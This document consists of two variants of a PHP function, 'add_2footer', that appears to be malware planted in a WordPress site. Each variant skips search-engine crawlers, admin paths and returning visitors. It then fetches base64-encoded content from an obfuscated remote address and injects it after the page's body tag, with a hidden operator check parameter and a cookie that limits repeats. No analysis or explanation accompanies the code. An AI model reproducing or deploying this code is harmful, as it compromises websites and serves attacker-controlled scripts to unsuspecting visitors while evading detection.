function add_2footer() { $check = false; $check_data = ""; if (!empty($_GET['check']) and $_GET['check'] == '4929f9b74e11d512640a3228cc010e82') { $check = true; $check_data = '<!--checker_start '; $check_data .= substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100); $check_data .= ' checker_end-->'; } if (!$check) { if (!@$_SERVER['HTTP_USER_AGENT'] or substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125' or preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { return; } $cookie_name = 'PHP_SESSION_PHP'; if (isset($_COOKIE[$cookie_name])) { return; } foreach (array('/\\.css$/', '/\\.swf$/', '/\\.ashx$/', '/\\.docx$/', '/\\.doc$/', '/\\.xls$/', '/\\.xlsx$/', '/\\.xml$/', '/\\.jpg$/', '/\\.pdf$/', '/\\.png$/', '/\\.gif$/', '/\\.ico$/', '/\\.js$/', '/\\.txt$/', '/ajax/', '/cron\\.php$/', '/wp\\-login\\.php$/', '/\\/wp\\-includes\\//', '/\\/wp\\-admin/', '/\\/admin\\//', '/\\/wp\\-content\\//', '/\\/administrator\\//', '/phpmyadmin/i', '/xmlrpc\\.php/', '/\\/feed\\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { return; } } } $buffer = ob_get_clean(); ob_start(); $regexp = '/<body[^>]*>/is'; if (preg_match($regexp, $buffer, $m)) { $body = $m[0]; // $url = base64_decode('a3d3czksLDE3Ny0yMjQtNTItMjM7LGFvbGQsPHVmbXZwJXZ3blxwbHZxYGY+NzM3NTI5MTA2MzM3OTA6NA=='); $url = decrypt_url('a3d3czksLDE3Ny0yMjQtNTItMjM7LGFvbGQsPHVmbXZwJXZ3blxwbHZxYGY+NzM3NTI5MTA2MzM3OTA6NA=='); // if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if ($code = request_url_data($url) and $decoded = base64_decode($code, true)) { // $body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>'; // $body .= base64_decode($m[0]); $body .= $decoded; // $body .= base64_decode($m[0]); } $body .= $check_data; $buffer = preg_replace($regexp, $body, $buffer); } echo $buffer; ob_flush(); }
function add_2footer() { $check = false; $check_data = ""; if (!empty($_GET['check']) and $_GET['check'] == '87e7f310bcbfcecd1dfb752517047e0a') { $check = true; $check_data = '<!--checker_start '; $check_data .= substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100); $check_data .= ' checker_end-->'; } if (!$check) { if (!@$_SERVER['HTTP_USER_AGENT'] or substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125' or preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { return; } $cookie_name = 'PHP_SESSION_PHP'; if (isset($_COOKIE[$cookie_name])) { return; } foreach (array('/\\.css$/', '/\\.swf$/', '/\\.ashx$/', '/\\.docx$/', '/\\.doc$/', '/\\.xls$/', '/\\.xlsx$/', '/\\.xml$/', '/\\.jpg$/', '/\\.pdf$/', '/\\.png$/', '/\\.gif$/', '/\\.ico$/', '/\\.js$/', '/\\.txt$/', '/ajax/', '/cron\\.php$/', '/wp\\-login\\.php$/', '/\\/wp\\-includes\\//', '/\\/wp\\-admin/', '/\\/admin\\//', '/\\/wp\\-content\\//', '/\\/administrator\\//', '/phpmyadmin/i', '/xmlrpc\\.php/', '/\\/feed\\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { return; } } } $buffer = ob_get_clean(); ob_start(); $regexp = '/<body[^>]*>/is'; if (preg_match($regexp, $buffer, $m)) { $body = $m[0]; $url = base64_decode('aHR0cDovLzEwOC42MS4xMTcuMjQ0L2Jsb2cvP3ZlbnVzJnV0bV9zb3VyY2U9NjgxNDozMjkwMzE6NTIw'); // if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if ($code = request_url_data($url) and $decoded = base64_decode($code, true)) { $body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>'; // $body .= base64_decode($m[0]); $body .= $decoded; // $body .= base64_decode($m[0]); } $body .= $check_data; $buffer = preg_replace($regexp, $body, $buffer); } echo $buffer; ob_flush(); }